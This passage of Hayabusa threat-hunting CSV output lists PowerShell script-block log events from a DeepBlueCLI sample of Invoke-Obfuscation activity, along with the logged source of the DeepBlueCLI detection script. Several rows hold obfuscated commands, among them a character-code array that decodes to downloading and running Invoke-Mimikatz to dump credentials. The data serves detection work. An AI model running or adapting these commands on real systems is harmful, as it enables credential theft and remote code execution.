$UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:15.743 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.186 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.194 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.199 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.205 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.208 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.212 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.222 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.253 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:16.268 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:17.070 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:17.087 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:17.127 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:22.147 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $PsHOME[21]+$pShOMe[30]+'x')( "" $( SET-ITeM 'vAriabLE:OFs' '')"" 
+[sTRing]('26K28!20%24l65J4e:76&3ai43i6f!4di73K50%45J63J5b:34!2cl31l35%2c&32i35%5d&2d!4aK4fJ69i6e&27l27%29&20!28i5bl73:54l52%49i4eJ67l5d%3a%3ai4a%4f:49K6el28K20:27&27:2ci20:28!28l37%33J2ci20!36l39!20:2c&38:38K20!2c!33:32K2ci20l34!30K20i2c&37i38&2c%31!30!31l2c:31:31K39J2cK34!35&2cJ37i39&20l2c%20l39J38l2cJ31%30K36i20J2cK31K30:31%2c!39i39&2ci31l31l36&2cl20J33&32!2c:20%37:38!20%2c!31i30i31i20:2c:20:31%31:36K2ci34l36K20:2cl38l37l2cJ31J30K31:20i2cl39K38l2cJ36&37%2c:20!31!30%38l2ci31&30!35%20%2c:20%31&30%31l2c!20K31&31K30!20&2c!31:31%36i20&2c!34:31l20J2c!34%36:2cl20&36!38!2c!20%31%31:31l2c!20l31&31i39:20J2cJ31&31i30K20J2c&31!30!38i20K2cK31&31J31:2cK20K39J37%2ci20K31K30K30K2c&20K38&33l20:2cJ20i31l31J36!20K2ci31:31!34!2c%20&31J30%35&20:2c&31l31:30:2cK31:30l33&20J2cK34i30l20J2c&33l39K2c&20!31:30&34J2c%31l31l36&20i2c&31i31i36i2c!31l31:32i2c!20l31i31!35&20l2c%35J38!2c:20%34!37!2c&20K34K37:20K2cl20%31%31!34:2c&39J37:20l2cK20K31J31i39l2c&20&34J36:20i2cJ20!31:30&33&2cJ31l30i35J20%2c!20l31i31K36!2cJ20i31J30K34%20:2cl31K31%37J2cl20:39i38:20i2c%31l31:37!2c!31i31!35i2c%20!31J30!31l2c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l
31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:22.154 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 
108, 111,105, 116, 47 ,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:22.178 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.530 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: 